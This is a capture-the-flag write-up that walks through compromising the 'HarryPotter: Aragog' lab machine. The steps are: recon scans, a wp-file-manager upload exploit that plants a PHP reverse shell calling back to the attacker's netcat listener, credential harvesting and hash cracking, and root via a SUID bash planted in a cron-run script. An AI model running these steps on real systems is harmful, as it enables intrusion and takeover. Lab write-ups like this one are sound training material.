How I took down a machine called “HarryPotter: Aragog”

Overview:

Target Machine IP Address: 192.168.56.121  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Medium

Although author mentioned it was easy but it took me close to 5 hours to take this down.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

We came to know our target or victim machine IP: 192.168.56.121

nmap -sC -sV -p- -Pn 192.168.56.121 -o nmap.log

Output: (Information redacted)

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)

Browsing website:

Searching Directory in Webserver

gobuster dir -u 192.168.56.121 -o gobuster.log

Output:

When we visit http://192.168.56.121/blog

We understood that it is running a wordpress website. Therefore, I ran wpscan to get more information about the website.

wpscan --stealthy --url http://192.168.56.121/blog/ --plugins-version-detection aggressive --plugins-detection aggressive  -o wpscan-version.log

We came to know that the website is running an old plugin called ‘wp-file-manager’.

Vulnerable plugin: wp-file-manager
Version: 6.0

By googling regarding exploit for the plugin


Detail can be viewed from here.

On Kali Linux Machine:

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

cp cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php payload.php   (the reason why I rename this file is because I am trying to follow the PoC mentioned in this link)

We have to mention the Target IP address and Port Number in payload.php;  in that case, it is 192.168.56.1 and 1234 (port number)

curl -k -F cmd=upload -F target=l1_ -F debug=1 -F 'upload[]=@payload.php' -X POST http://192.168.56.121/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

Open a new Terminal Kali Linux Machine:

nc -lvp 1234

On Kali Linux Machine (continue with the above curl command):

curl -kiLsS http://192.168.56.121/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php

Do you see that on that new Terminal Window, you received a reverse connection.

$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Aragog:/$ export TERM=xterm
export TERM=xterm

User Flag: (There were two users and I know you will figure it out that under which user it has the userflag)

horcrux1.txt
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

─$ echo "MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==" | base64 -d 
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

Since we know that the website was a WordPress based site, so I went to check for wp-config file and I was not able to find it under the usual location.

My knowledge on server setup came into handy.


The website directory or the website is located here /usr/share/wordpress

However, I know that this wp-config.php is not the real file. I am little impressed with the machine designer because one of my role in the current organization where I work is to setup WordPress environment and I tried my best to structure it in a way that hacker will face tough time to get it. Likewise, if I know how the machine designer place it’s wp-config.php, I will implement it in my upcoming project work. Anyway, let’s find where it is located.

ls -lah

cd /etc/wordpress
ls -lah 
cat config-default.php

DB_NAME: wordpress
DB_USER: root
DB_PASSWORD: mySecr3tPass

 

On Kali Linux Machine:

echo "$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc." > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john --show

Do you recall that during the scanning phases (initial), we came to know that the machine is running with ssh service. Let’s try to login it with using the following credentials…

username: hagrid98
password: password123
Machine: 192.168.56.121

ssh hagrid98@192.168.56.121    #we got login

I was playing around and couldn’t find anything useful. It is my ritual that at this time if I don’t get anything useful, I run linpeas.sh on the victim machine (I hope you have already picked-up how to do this by now, I mean using SimpleHTTPServer 🙂 ).

I came to know that the machine has a weird file

-rwxr-xr-x 1 hagrid98 hagrid98 81 Apr 1 20:03 /opt/.backup.sh

cat /opt/.backup.sh

#!/bin/bash
cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads

When I check the permission of the folder at /tmp/tmp_wp_uploads; do you see what I see? (It has root for user and group)

Although user hagrid98 has no crontab entry but it looks like root user has. Therefore, let us add the following line as the entry to the above file .backup.sh.

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

Note: set user or group ID on execution (s) chmod +s is used.

I waited around 5 minutes and finally I got what I wanted, the binary with execute permission enabled.

hagrid98@Aragog:/tmp$ ls -lah
total 2.3M
drwxrwxrwt 10 root root 4.0K May 28 17:28 .
drwxr-xr-x 18 root root 4.0K Mar 31 17:52 ..
-rwsr-sr-x 1 root root 1.2M May 28 17:32 bash
-rwxr-xr-x 1 root root 1.2M May 28 17:24 bash1
drwxrwxrwt 2 root root 4.0K May 28 12:42 .font-unix
drwxrwxrwt 2 root root 4.0K May 28 12:42 .ICE-unix
drwx------ 3 root root 4.0K May 28 12:42 systemd-private-b275630ffd804e5187080888580cb0b0-apache2.service-JVTT6g
drwx------ 3 root root 4.0K May 28 12:42 systemd-private-b275630ffd804e5187080888580cb0b0-systemd-timesyncd.service-AHdvzF
drwxrwxrwt 2 root root 4.0K May 28 12:42 .Test-unix
drwxr-xr-x 5 root root 4.0K May 28 12:46 tmp_wp_uploads
drwxrwxrwt 2 root root 4.0K May 28 12:42 .X11-unix
drwxrwxrwt 2 root root 4.0K May 28 12:42 .XIM-unix
hagrid98@Aragog:/tmp$
hagrid98@Aragog:/tmp$ ./bash -p       #visit this link if you don't know why i used this line of command
hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}
In muggle terms: 2: maRvoLo GaUnt's riNg deStrOyed bY DUmbledOre

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Menu